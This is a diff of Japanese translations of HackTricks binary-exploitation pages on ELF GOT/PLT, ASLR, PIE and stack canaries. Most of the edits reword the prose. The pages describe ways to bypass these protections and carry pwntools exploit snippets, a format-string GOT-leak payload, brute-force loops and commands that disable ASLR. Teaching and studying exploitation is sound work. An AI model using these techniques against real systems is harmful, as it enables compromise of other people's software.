are indicated in the relocation table in formats REL or RELA and the number of relocations is given in the dynamic sections RELSZ or RELASZ. ``` readelf -r lnstat @@ -350,7 +350,7 @@ Offset Info Type Sym. Value Sym. Name + Addend ### 動的再配置とGOT -再配置は外部シンボル(依存関係からの関数など)を参照することもあります。例えば、libCからのmalloc関数です。この場合、ローダーはlibCをアドレスにロードする際に、malloc関数がロードされている場所を確認し、そのアドレスをGOT(グローバルオフセットテーブル)に書き込みます(再配置テーブルで示される)mallocのアドレスが指定されるべき場所です。 +再配置は外部シンボル(依存関係からの関数など)を参照することもあります。例えば、libCからのmalloc関数です。ローダーがlibCをアドレスにロードする際、malloc関数がロードされている場所を確認し、そのアドレスをGOT(グローバルオフセットテーブル)に書き込みます(再配置テーブルで示される)mallocのアドレスが指定されるべき場所です。 ### プロシージャリンクテーブル @@ -360,15 +360,15 @@ PLTセクションは遅延バインディングを実行することを可能 #### 攻撃に影響を与える現代のリンク動作 -- `-z now`(フルRELRO)は遅延バインディングを無効にします。PLTエントリは存在しますが、GOT/PLTは読み取り専用にマッピングされるため、**GOT上書き**や**ret2dlresolve**のような技術はメインバイナリに対しては機能しません(ライブラリは部分的にRELROである可能性があります)。参照してください: +- `-z now`(フルRELRO)は遅延バインディングを無効にします。PLTエントリは存在しますが、GOT/PLTは読み取り専用にマッピングされるため、**GOT上書き**や**ret2dlresolve**のような技術はメインバイナリに対しては機能しません(ライブラリは部分的にRELROのままである可能性があります)。参照してください: {{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} -- `-fno-plt`はコンパイラが**GOTエントリを直接**介して外部関数を呼び出すようにします。これにより、`call func@plt`の代わりに`mov reg, [got]; call reg`のような呼び出しシーケンスが見られます。これにより、投機的実行の悪用が減少し、PLTスタブ周辺のROPガジェットハンティングがわずかに変わります。 +- -fno-pltはコンパイラが**GOTエントリを直接**介して外部関数を呼び出すようにします。これにより、call func@pltの代わりにmov reg, [got]; call regのような呼び出しシーケンスが見られます。これにより、投機的実行の悪用が減少し、PLTスタブ周辺のROPガジェットハンティングがわずかに変更されます。 -- PIEと静的PIE:PIE(`INTERP`を持つET_DYN)は動的ローダーを必要とし、通常のPLT/GOT機構をサポートします。静的PIE(`INTERP`を持たないET_DYN)はカーネルローダーによって再配置が適用され、`ld.so`はありません。ランタイムでのPLT解決は期待できません。 +- PIEと静的PIE:PIE(ET_DYNとINTERPを持つ)は動的ローダーを必要とし、通常のPLT/GOT機構をサポートします。静的PIE(ET_DYNでINTERPなし)はカーネルローダーによって適用される再配置を持ち、ld.soはありません。ランタイムでのPLT解決は期待できません。 > GOT/PLTが選択肢でない場合は、他の書き込み可能なコードポインタにピボットするか、libcへの古典的なROP/SROPを使用してください。 @@ -378,7 +378,7 @@ PLTセクションは遅延バインディングを実行することを可能 ## プログラム初期化 -プログラムがロードされた後、実行する時間です。しかし、最初に実行されるコードは**必ずしも`main`**関数ではありません。これは、例えばC++では**グローバル変数がクラスのオブジェクト**である場合、このオブジェクトはmainが実行される前に**初期化**されなければならないためです。 +プログラムがロードされた後、実行する時間です。しかし、実行される最初のコードは**必ずしも`main`**関数ではありません。これは、例えばC++では**グローバル変数がクラスのオブジェクト**である場合、このオブジェクトはmainが実行される前に**初期化**されなければならないためです。 ```cpp #include // g++ autoinit.cpp -o autoinit @@ -414,7 +414,7 @@ __attributte__((destructor)) //Add to the destructor list #### 攻撃メモ -- Partial RELRO の下では、これらの配列は `ld.so` が `PT_GNU_RELRO` を読み取り専用に切り替える前にまだ書き込み可能なページに存在します。十分早く任意の書き込みを取得するか、ライブラリの書き込み可能な配列をターゲットにすることができれば、選択した関数でエントリを上書きすることで制御フローをハイジャックできます。Full RELRO の下では、実行時に読み取り専用です。 +- Partial RELRO の下では、これらの配列は `ld.so` が `PT_GNU_RELRO` を読み取り専用に切り替える前にまだ書き込み可能なページに存在します。十分早く任意の書き込みを取得するか、ライブラリの書き込み可能な配列をターゲットにすることができれば、選択した関数でエントリを上書きすることによって制御フローをハイジャックできます。Full RELRO の下では、実行時に読み取り専用です。 - 動的リンカーの遅延バインディングを悪用して、実行時に任意のシンボルを解決する方法については、専用ページを参照してください: @@ -439,13 +439,13 @@ __attributte__((destructor)) //Add to the destructor list これが使用されると、ELF では **`.tdata`** および **`.tbss`** セクションが使用されます。これは TLS 用の `.data`(初期化済み)および `.bss`(未初期化)に似ています。 -各変数は TLS ヘッダーにエントリを持ち、サイズと TLS オフセットを指定します。これはスレッドのローカルデータ領域で使用されるオフセットです。 +各変数は、サイズと TLS オフセットを指定する TLS ヘッダーにエントリを持ち、これはスレッドのローカルデータ領域で使用されるオフセットです。 `__TLS_MODULE_BASE` はスレッドローカルストレージのベースアドレスを参照するために使用されるシンボルで、モジュールのすべてのスレッドローカルデータを含むメモリ内の領域を指します。 -## 補助ベクター (auxv) と vDSO +## 補助ベクタ (auxv) と vDSO -Linux カーネルは、実行時に役立つアドレスやフラグを含む補助ベクターをプロセスに渡します: +Linux カーネルは、ランタイムに役立つアドレスやフラグを含む補助ベクタをプロセスに渡します: - `AT_RANDOM`: glibc がスタックカナリアや他の PRNG シードに使用する 16 バイトのランダムデータを指します。 - `AT_SYSINFO_EHDR`: vDSO マッピングのベースアドレス(`__kernel_*` システムコールやガジェットを見つけるのに便利)。 @@ -464,7 +464,7 @@ printf("AT_RANDOM=%p\n", (void*)getauxval(AT_RANDOM)); printf("AT_SYSINFO_EHDR=%p\n", (void*)getauxval(AT_SYSINFO_EHDR)); } ``` -`AT_RANDOM`を漏洩させることで、そのポインタを参照できればカナリア値を取得できます;`AT_SYSINFO_EHDR`は、ガジェットを探すためのvDSOベースを提供したり、直接高速システムコールを呼び出すために使用できます。 +`AT_RANDOM`を漏洩させることで、そのポインタを参照できればカナリア値を取得できます。`AT_SYSINFO_EHDR`は、ガジェットを探すためのvDSOベースを提供したり、直接高速システムコールを呼び出すために使用できます。 ## References diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index 59c35ee5a..ed6fc60e3 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md @@ -20,34 +20,34 @@ cat /proc/sys/kernel/randomize_va_space ``` ### **ASLRの無効化** -ASLRを**無効化**するには、`/proc/sys/kernel/randomize_va_space`の値を**0**に設定します。ASLRを無効化することは、一般的にテストやデバッグのシナリオ以外では推奨されません。以下は、無効化する方法です: +ASLRを**無効化**するには、`/proc/sys/kernel/randomize_va_space`の値を**0**に設定します。ASLRを無効化することは、テストやデバッグのシナリオ以外では一般的に推奨されません。無効化する方法は次のとおりです: ```bash echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ``` -実行のためにASLRを無効にすることもできます: +実行時にASLRを無効にすることもできます: ```bash setarch `arch` -R ./bin args setarch `uname -m` -R ./bin args ``` ### **ASLRの有効化** -ASLRを**有効化**するには、`/proc/sys/kernel/randomize_va_space`ファイルに**2**の値を書き込むことができます。これには通常、root権限が必要です。完全なランダム化は、次のコマンドで行うことができます: +ASLRを**有効化**するには、`/proc/sys/kernel/randomize_va_space`ファイルに**2**の値を書き込むことができます。これには通常、root権限が必要です。完全なランダム化は、次のコマンドで行うことができます: ```bash echo 2 | sudo tee /proc/sys/kernel/randomize_va_space ``` -### **再起動を跨いだ持続性** +### **再起動を通じた永続性** -`echo` コマンドで行った変更は一時的であり、再起動時にリセットされます。変更を持続させるには、`/etc/sysctl.conf` ファイルを編集し、以下の行を追加または修正する必要があります: +`echo` コマンドで行った変更は一時的であり、再起動時にリセットされます。変更を永続的にするには、`/etc/sysctl.conf` ファイルを編集し、次の行を追加または修正する必要があります: ```tsconfig kernel.randomize_va_space=2 # Enable ASLR # or kernel.randomize_va_space=0 # Disable ASLR ``` -`/etc/sysctl.conf`を編集した後、次のコマンドで変更を適用します: +`/etc/sysctl.conf`を編集した後、変更を適用するには次のコマンドを使用します: ```bash sudo sysctl -p ``` -これにより、再起動後もASLR設定が維持されます。 +これは、再起動を通じてASLR設定が維持されることを保証します。 ## **バイパス** @@ -59,13 +59,13 @@ PaXはプロセスアドレス空間を**3つのグループ**に分けます: - `mmap()`によって割り当てられた**メモリ**および**共有ライブラリ** —> **16ビット**、`delta_mmap`と呼ばれます。 - **スタック** —> **24ビット**、`delta_stack`と呼ばれます。ただし、実際には**11ビット**(10バイト目から20バイト目までを含む)を使用し、**16バイト**に整列されています —> これにより、**524,288の実際のスタックアドレス**が可能になります。 -前述のデータは32ビットシステム用であり、最終的なエントロピーが減少することで、エクスプロイトが成功するまで実行を何度も再試行することでASLRをバイパスすることが可能になります。 +前述のデータは32ビットシステム用であり、最終的なエントロピーの低下により、エクスプロイトが成功するまで実行を何度も再試行することでASLRをバイパスすることが可能になります。 #### ブルートフォースのアイデア: - シェルコードの前に**大きなNOPスレッド**をホストするのに十分なオーバーフローがある場合、スタック内のアドレスをブルートフォースして、フローが**NOPスレッドの一部を飛び越える**まで試すことができます。 - オーバーフローがそれほど大きくなく、エクスプロイトをローカルで実行できる場合は、**環境変数にNOPスレッドとシェルコードを追加する**ことが可能です。 -- エクスプロイトがローカルである場合、libcのベースアドレスをブルートフォースすることを試みることができます(32ビットシステムに便利です): +- エクスプロイトがローカルである場合、libcのベースアドレスをブルートフォースすることを試みることができます(32ビットシステムに便利): ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` @@ -76,7 +76,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000): ### 64ビットスタックのブルートフォース -環境変数でスタックの大部分を占有し、その後、バイナリをローカルで何百回、何千回も悪用しようとすることが可能です。\ +環境変数でスタックの大部分を占有し、その後、バイナリをローカルで何百回、何千回も悪用することが可能です。\ 以下のコードは、**スタック内のアドレスを選択するだけで**、**数百回の実行ごとに**そのアドレスが**NOP命令**を含むことができる方法を示しています。 ```c //clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie @@ -151,10 +151,10 @@ pass - **startstack**: **スタック**の開始アドレス - **start_data** & **end_data**: **BSS**の上と下のアドレス - **kstkesp** & **kstkeip**: 現在の**ESP**と**EIP**アドレス -- **arg_start** & **arg_end**: **cli arguments**の上と下のアドレス -- **env_start** &**env_end**: **env variables**の上と下のアドレス +- **arg_start** & **arg_end**: **CLI引数**の上と下のアドレス +- **env_start** &**env_end**: **環境変数**の上と下のアドレス -したがって、攻撃者がエクスプロイトされているバイナリと同じコンピュータにいる場合、このバイナリが生の引数からのオーバーフローを期待していないが、このファイルを読み取った後に作成できる別の**入力からのオーバーフローを期待している場合**、攻撃者はこのファイルから**いくつかのアドレスを取得し、それらからオフセットを構築してエクスプロイトを行う**ことが可能です。 +したがって、攻撃者がエクスプロイトされているバイナリと同じコンピュータにいる場合、このバイナリが生の引数からのオーバーフローを期待していないが、このファイルを読み取った後に作成できる別の**入力からのオーバーフローを期待している場合**、攻撃者はこのファイルから**いくつかのアドレスを取得し、それらからオフセットを構築することが可能です**。 > [!TIP] > このファイルに関する詳細は、[https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html)で`/proc/pid/stat`を検索してください。 @@ -163,7 +163,7 @@ pass - **課題はリークを提供することです** -リークが与えられた場合(簡単なCTFチャレンジ)、それからオフセットを計算することができます(例えば、エクスプロイトしているシステムで使用されている正確なlibcバージョンを知っていると仮定します)。この例のエクスプロイトは、[**ここからの例**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak)から抜粋されています(詳細はそのページを確認してください): +リークが与えられた場合(簡単なCTFチャレンジ)、それからオフセットを計算することができます(例えば、エクスプロイトしているシステムで使用されている正確なlibcバージョンを知っていると仮定した場合)。この例のエクスプロイトは、[**ここからの例**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak)から抜粋されています(詳細はそのページを確認してください): ```python from pwn import * @@ -190,7 +190,8 @@ p.interactive() ``` - **ret2plt** -バッファオーバーフローを悪用することで、**ret2plt**を利用してlibcの関数のアドレスを抽出することが可能です。確認してください: +バッファオーバーフローを悪用することで、**ret2plt**を利用してlibcから関数のアドレスを抽出することが可能です。確認してください: + {{#ref}} ret2plt.md @@ -198,7 +199,7 @@ ret2plt.md - **Format Strings Arbitrary Read** -ret2pltと同様に、フォーマット文字列の脆弱性を介して任意の読み取りが可能であれば、GOTから**libc関数**のアドレスを抽出することができます。以下の[**例はここから**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got): +ret2pltと同様に、フォーマット文字列の脆弱性を介して任意の読み取りが可能であれば、GOTから**libc関数**のアドレスを抽出することができます。次の[**例はここから**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got): ```python payload = p32(elf.got['puts']) # p64() if 64-bit payload += b'|' @@ -209,7 +210,7 @@ payload += b'%3$s' # The third parameter points at the start of the payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer payload += p32(elf.symbols['main']) ``` -フォーマット文字列の任意の読み取りに関する詳細情報は次の場所で見つけることができます: +あなたはフォーマット文字列の任意の読み取りに関する詳細情報を以下で見つけることができます: {{#ref}} ../../format-strings/ @@ -217,7 +218,7 @@ payload += p32(elf.symbols['main']) ### Ret2ret & Ret2pop -スタック内のアドレスを悪用してASLRをバイパスしようとします: +スタック内のアドレスを悪用してASLRをバイパスしようとしてください: {{#ref}} ret2ret.md @@ -225,12 +226,12 @@ ret2ret.md ### vsyscall -**`vsyscall`** メカニズムは、特定のシステムコールをユーザースペースで実行できるようにすることでパフォーマンスを向上させますが、これらは基本的にカーネルの一部です。**vsyscall** の重要な利点は、**ASLR**(アドレス空間配置のランダム化)の影響を受けない**固定アドレス**にあります。この固定性により、攻撃者はアドレスを特定し、エクスプロイトで使用するために情報漏洩の脆弱性を必要としません。\ -ただし、ここでは特に興味深いガジェットは見つかりません(例えば、`ret;` の同等物を取得することは可能ですが)。 +**`vsyscall`** メカニズムは、特定のシステムコールをユーザースペースで実行できるようにすることでパフォーマンスを向上させますが、これらは基本的にカーネルの一部です。**vsyscalls** の重要な利点は、**ASLR**(アドレス空間配置のランダム化)の影響を受けない**固定アドレス**にあります。この固定性により、攻撃者はアドレスを特定し、エクスプロイトで使用するために情報漏洩の脆弱性を必要としません。\ +しかし、ここでは特に興味深いガジェットは見つからないでしょう(例えば、`ret;` の同等物を取得することは可能です)。 -(以下の例とコードは [**この書き込みから**](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html#exploitation) です) +(以下の例とコードは[**この書き込みから**](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html#exploitation)です) -例えば、攻撃者はエクスプロイト内でアドレス `0xffffffffff600800` を使用するかもしれません。`ret` 命令に直接ジャンプしようとすると、いくつかのガジェットを実行した後に不安定になったりクラッシュしたりする可能性がありますが、**vsyscall** セクションによって提供される `syscall` の開始地点にジャンプすることは成功する可能性があります。この**vsyscall** アドレスへの実行を導く**ROP**ガジェットを慎重に配置することで、攻撃者はこのエクスプロイトの部分で**ASLR**をバイパスすることなくコード実行を達成できます。 +例えば、攻撃者はエクスプロイト内でアドレス `0xffffffffff600800` を使用するかもしれません。`ret` 命令に直接ジャンプしようとすると、いくつかのガジェットを実行した後に不安定さやクラッシュを引き起こす可能性がありますが、**vsyscall** セクションによって提供される `syscall` の開始地点にジャンプすることは成功する可能性があります。この**vsyscall** アドレスに実行を導く**ROP**ガジェットを慎重に配置することで、攻撃者はこのエクスプロイトの部分で**ASLR**をバイパスすることなくコード実行を達成できます。 ``` ef➤ vmmap Start End Offset Perm Path @@ -273,7 +274,7 @@ gef➤ x/4i 0xffffffffff600800 ``` ### vDSO -したがって、カーネルが CONFIG_COMPAT_VDSO でコンパイルされている場合、**vdso を悪用して ASLR をバイパスする**ことが可能であることに注意してください。vdso アドレスはランダム化されません。詳細については、次を確認してください: +したがって、カーネルがCONFIG_COMPAT_VDSOでコンパイルされている場合、**vdsoを悪用してASLRをバイパスする**ことが可能であることに注意してください。vdsoアドレスはランダム化されません。詳細については、次を確認してください: {{#ref}} ../../rop-return-oriented-programing/ret2vdso.md diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md index cc8696d4a..ae35d47d2 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md @@ -6,24 +6,24 @@ PIE(**Position Independent Executable**)としてコンパイルされたバイナリは、**プログラムが実行されるたびに異なるメモリ位置にロードされる**ことを意味し、ハードコーディングされたアドレスを防ぎます。 -これらのバイナリを悪用するトリックは、**相対アドレス**を利用することにあります。プログラムの部分間のオフセットは、絶対位置が変わっても同じままです。**PIEをバイパスするには、1つのアドレスを漏洩させるだけで済みます**。通常は、フォーマットストリング攻撃のような脆弱性を使用して**スタック**から取得します。アドレスを取得したら、**固定オフセット**を使って他のアドレスを計算できます。 +これらのバイナリを悪用するトリックは、**相対アドレス**を利用することにあります。プログラムの部分間のオフセットは、絶対位置が変わっても同じままです。**PIEをバイパスするには、1つのアドレスを漏洩させるだけで済みます**。通常は、フォーマットストリング攻撃のような脆弱性を使用して**スタック**から取得します。アドレスを取得したら、その**固定オフセット**を使って他のアドレスを計算できます。 -PIEバイナリを悪用する際の役立つヒントは、**基本アドレスが通常000で終わる**ことです。これは、メモリページがランダム化の単位であり、サイズが0x1000バイトであるためです。このアライメントは、**エクスプロイトが期待通りに動作しない場合の重要なチェック**となり、正しい基本アドレスが特定されているかどうかを示します。\ +PIEバイナリを悪用する際の役立つヒントは、メモリページがランダム化の単位であり、サイズが0x1000バイトであるため、**基本アドレスは通常000で終わる**ことです。このアライメントは、**エクスプロイトが期待通りに動作しない場合の重要なチェック**となり、正しい基本アドレスが特定されているかどうかを示します。\ また、エクスプロイトにこれを使用することもできます。アドレスが**`0x649e1024`**にあることが漏洩した場合、**基本アドレスは`0x649e1000`**であることがわかり、そこから関数や位置の**オフセットを計算**できます。 ## バイパス PIEをバイパスするには、**ロードされたバイナリのアドレスを漏洩させる**必要があります。これにはいくつかのオプションがあります: -- **ASLRを無効にする**: ASLRが無効になっている場合、PIEでコンパイルされたバイナリは常に**同じアドレスにロードされる**ため、**PIEは無意味になります**。オブジェクトのアドレスは常に同じ場所にあります。 +- **ASLRを無効にする**:ASLRが無効になっている場合、PIEでコンパイルされたバイナリは常に**同じアドレスにロードされる**ため、**PIEは無意味になります**。オブジェクトのアドレスは常に同じ場所にあります。 - 漏洩を**与えられる**(簡単なCTFチャレンジで一般的、[**この例を確認**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)) -- スタック内の**EBPおよびEIP値をブルートフォース**して正しいものを漏洩させる: +- スタック内の**EBPおよびEIP値をブルートフォース**して、正しいものを漏洩させる: {{#ref}} bypassing-canary-and-pie.md {{#endref}} -- [**フォーマットストリング**](../../format-strings/index.html)のような**任意の読み取り**脆弱性を使用して、バイナリのアドレスを漏洩させる(例:前の技術のようにスタックから)ことで、バイナリの基本を取得し、そこからオフセットを使用します。[**ここに例を見つけてください**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass)。 +- [**フォーマットストリング**](../../format-strings/index.html)のような**任意の読み取り**脆弱性を使用して、バイナリのアドレスを漏洩させ(例:前の技術のようにスタックから)、バイナリのベースを取得し、そこからオフセットを使用します。[**ここに例を見つけてください**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass)。 ## 参考文献 diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md index 24eafc1f2..72836c6d9 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md @@ -1,37 +1,37 @@ -# スタックカナリア +# Stack Canaries {{#include ../../../banners/hacktricks-training.md}} ## **StackGuard と StackShield** -**StackGuard** は、**EIP (Extended Instruction Pointer)** の前に **カナリア** として知られる特別な値 `0x000aff0d`(ヌル、改行、EOF、キャリッジリターンを表す)を挿入して、バッファオーバーフローから保護します。しかし、`recv()`、`memcpy()`、`read()`、および `bcopy()` のような関数は依然として脆弱であり、**EBP (Base Pointer)** を保護することはありません。 +**StackGuard** は、**EIP (Extended Instruction Pointer)** の前に **canary** として知られる特別な値を挿入します。具体的には `0x000aff0d`(ヌル、改行、EOF、キャリッジリターンを表す)で、バッファオーバーフローから保護します。しかし、`recv()`、`memcpy()`、`read()`、および `bcopy()` のような関数は依然として脆弱であり、**EBP (Base Pointer)** を保護しません。 -**StackShield** は、すべての戻りアドレス (**EIPs**) を保存する **グローバルリターンスタック** を維持することで、StackGuard よりも洗練されたアプローチを取ります。この設定により、オーバーフローが発生しても害を及ぼさず、保存された戻りアドレスと実際の戻りアドレスを比較してオーバーフローの発生を検出できます。さらに、StackShield は戻りアドレスを境界値と照合して、**EIP** が期待されるデータ空間の外を指しているかどうかを検出できます。しかし、この保護は Return-to-libc、ROP (Return-Oriented Programming)、または ret2ret のような技術によって回避可能であり、StackShield がローカル変数を保護しないことを示しています。 +**StackShield** は、**Global Return Stack** を維持することで、StackGuard よりも洗練されたアプローチを取ります。これにより、すべての戻りアドレス(**EIPs**)が保存され、オーバーフローが発生しても害を及ぼさないようにします。保存された戻りアドレスと実際の戻りアドレスを比較することで、オーバーフローの発生を検出できます。さらに、StackShield は戻りアドレスを境界値と照合して、**EIP** が期待されるデータ空間の外を指しているかどうかを検出できます。しかし、この保護は Return-to-libc、ROP (Return-Oriented Programming)、または ret2ret のような技術によって回避可能であり、StackShield がローカル変数を保護しないことを示しています。 ## **Stack Smash Protector (ProPolice) `-fstack-protector`:** -このメカニズムは、**EBP** の前に **カナリア** を配置し、ローカル変数を再配置してバッファをより高いメモリアドレスに配置し、他の変数を上書きしないようにします。また、ローカル変数の上にスタックで渡された引数を安全にコピーし、これらのコピーを引数として使用します。しかし、8 要素未満の配列やユーザーの構造内のバッファは保護されません。 +このメカニズムは、**EBP** の前に **canary** を配置し、ローカル変数を再配置してバッファを高いメモリアドレスに配置し、他の変数を上書きできないようにします。また、ローカル変数の上にスタックで渡された引数を安全にコピーし、これらのコピーを引数として使用します。しかし、8 要素未満の配列やユーザーの構造内のバッファは保護しません。 -**カナリア** は `/dev/urandom` から派生したランダムな数またはデフォルト値 `0xff0a0000` です。これは **TLS (Thread Local Storage)** に保存され、スレッド間で共有メモリ空間がスレッド固有のグローバルまたは静的変数を持つことを可能にします。これらの変数は最初に親プロセスからコピーされ、子プロセスは親や兄弟に影響を与えずにデータを変更できます。しかし、**`fork()` を使用して新しいカナリアを作成しない場合、すべてのプロセス(親と子)は同じカナリアを共有し、脆弱になります**。**i386** アーキテクチャでは、カナリアは `gs:0x14` に保存され、**x86_64** では `fs:0x28` に保存されます。 +**canary** は `/dev/urandom` から派生したランダムな数またはデフォルト値 `0xff0a0000` です。これは **TLS (Thread Local Storage)** に保存され、スレッド間で共有メモリ空間がスレッド固有のグローバルまたは静的変数を持つことを可能にします。これらの変数は最初に親プロセスからコピーされ、子プロセスは親や兄弟に影響を与えずにデータを変更できます。しかし、**`fork()` を使用して新しい canary を作成しない場合、すべてのプロセス(親と子)は同じ canary を共有し、脆弱になります**。**i386** アーキテクチャでは、canary は `gs:0x14` に保存され、**x86_64** では `fs:0x28` に保存されます。 -このローカル保護は、攻撃に脆弱なバッファを持つ関数を特定し、これらの関数の先頭にカナリアを配置するコードを注入し、末尾でその整合性を確認します。 +このローカル保護は、攻撃に脆弱なバッファを持つ関数を特定し、これらの関数の先頭にコードを注入して canary を配置し、末尾でその整合性を確認します。 -ウェブサーバーが `fork()` を使用すると、カナリアをバイト単位で推測するブルートフォース攻撃が可能になります。しかし、`fork()` の後に `execve()` を使用すると、メモリ空間が上書きされ、攻撃が無効になります。`vfork()` は、子プロセスが書き込みを試みるまで複製なしで実行できるため、プロセス作成とメモリ処理に異なるアプローチを提供します。 +ウェブサーバーが `fork()` を使用すると、canary バイトをバイト単位で推測するためのブルートフォース攻撃が可能になります。しかし、`fork()` の後に `execve()` を使用するとメモリ空間が上書きされ、攻撃が無効になります。`vfork()` は、子プロセスが書き込みを試みるまで複製なしで実行できるようにし、その時点で複製が作成され、プロセスの作成とメモリ管理に異なるアプローチを提供します。 ### 長さ -`x64` バイナリでは、カナリアクッキーは **`0x8`** バイトの qword です。最初の 7 バイトはランダムで、最後のバイトは **ヌルバイト** です。 +`x64` バイナリでは、canary クッキーは **`0x8`** バイトの qword です。**最初の 7 バイトはランダム**で、最後のバイトは **ヌルバイト**です。 -`x86` バイナリでは、カナリアクッキーは **`0x4`** バイトの dword です。最初の 3 バイトはランダムで、最後のバイトは **ヌルバイト** です。 +`x86` バイナリでは、canary クッキーは **`0x4`** バイトの dword です。**最初の 3 バイトはランダム**で、最後のバイトは **ヌルバイト**です。 > [!CAUTION] -> 両方のカナリアの最下位バイトはヌルバイトです。これは、スタックの最初に低いアドレスから来るため、**文字列を読み取る関数はそれを読み取る前に停止します**。 +> 両方の canary の最下位バイトはヌルバイトであり、これはスタックの最初に来るため、**文字列を読み取る関数はそれを読み取る前に停止します**。 ## バイパス -**カナリアを漏洩させ**、その後自分の値で上書きします(例:バッファオーバーフロー)。 +**canary を漏洩させ**、その後自分の値で上書きします(例:バッファオーバーフロー)。 -- **カナリアが子プロセスでフォークされる場合**、1 バイトずつ **ブルートフォース** することが可能かもしれません: +- **canary が子プロセスでフォークされる場合**、1 バイトずつ **ブルートフォース** することが可能かもしれません: {{#ref}} bf-forked-stack-canaries.md @@ -45,25 +45,25 @@ print-stack-canary.md - **スタックに保存されたポインタの上書き** -スタックがスタックオーバーフローに脆弱な場合、**上書き可能な文字列や関数へのアドレスを含む可能性があります**。これにより、スタックカナリアに到達することなく脆弱性を悪用できます。確認してください: +スタックがスタックオーバーフローに脆弱な場合、**上書き可能な文字列や関数のアドレスを含む可能性があります**。これにより、スタック canary に到達することなく脆弱性を悪用できます。確認してください: {{#ref}} ../../stack-overflow/pointer-redirecting.md {{#endref}} -- **マスターとスレッドカナリアの両方を変更** +- **マスターとスレッドの canary の両方を変更** -カナリアで保護されたスレッド関数のバッファ **オーバーフロー** を使用して、**スレッドのマスターカナリアを変更**できます。その結果、チェックが同じ(ただし変更された)2つのカナリアで使用されるため、緩和策は無効になります。 +canary で保護されたスレッド関数のバッファ **オーバーフロー** を使用して、**スレッドのマスター canary を変更**できます。その結果、チェックが同じ(ただし変更された)2 つの canary で使用されるため、緩和策は無効になります。 -さらに、カナリアで保護されたスレッド関数のバッファ **オーバーフロー** を使用して、**TLS に保存されたマスターカナリアを変更**することもできます。これは、スレッドの **スタック** での **bof** を介して TLS が保存されているメモリ位置に到達することが可能であるためです。\ -その結果、チェックが同じ(ただし変更された)2つのカナリアで使用されるため、緩和策は無効になります。\ +さらに、canary で保護されたスレッド関数のバッファ **オーバーフロー** を使用して、**TLS に保存されたマスター canary を変更**することもできます。これは、スレッドのスタック内の **bof** を介して TLS が保存されているメモリ位置に到達することが可能であるためです。\ +その結果、チェックが同じ(ただし変更された)2 つの canary で使用されるため、緩和策は無効になります。\ この攻撃は次の書き込みで実行されます:[http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) -また、[https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) のプレゼンテーションも確認してください。これは、通常 **TLS** が **`mmap`** によって保存され、スレッドの **スタック** が作成されるときにも `mmap` によって生成されるため、前述の書き込みで示されたようにオーバーフローを許可する可能性があることを示しています。 +また、[https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) のプレゼンテーションも確認してください。これは、通常 **TLS** が **`mmap`** によって保存され、スレッドの **スタック** が `mmap` によって生成されることを示唆しており、これにより前述の書き込みで示されたようにオーバーフローが可能になるかもしれません。 - **`__stack_chk_fail` の GOT エントリを変更** -バイナリが Partial RELRO を持っている場合、任意の書き込みを使用して **`__stack_chk_fail`** の **GOT エントリをダミー関数に変更**し、カナリアが変更されてもプログラムがブロックされないようにできます。 +バイナリが Partial RELRO を持っている場合、任意の書き込みを使用して **`__stack_chk_fail` の GOT エントリを**、canary が変更されてもプログラムをブロックしないダミー関数に変更できます。 この攻撃は次の書き込みで実行されます:[https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index 4a8284f2c..78d39786b 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md @@ -4,24 +4,25 @@ ## Enlarge printed stack -スタックオーバーフローに**脆弱なプログラム**が**スタックオーバーフロー**の**一部**を指す**puts**関数を実行できる状況を想像してください。攻撃者は**カナリアの最初のバイトがヌルバイト**(`\x00`)であり、残りのカナリアは**ランダム**なバイトであることを知っています。次に、攻撃者は**カナリアの最初のバイト**までスタックを**上書きする**オーバーフローを作成することができます。 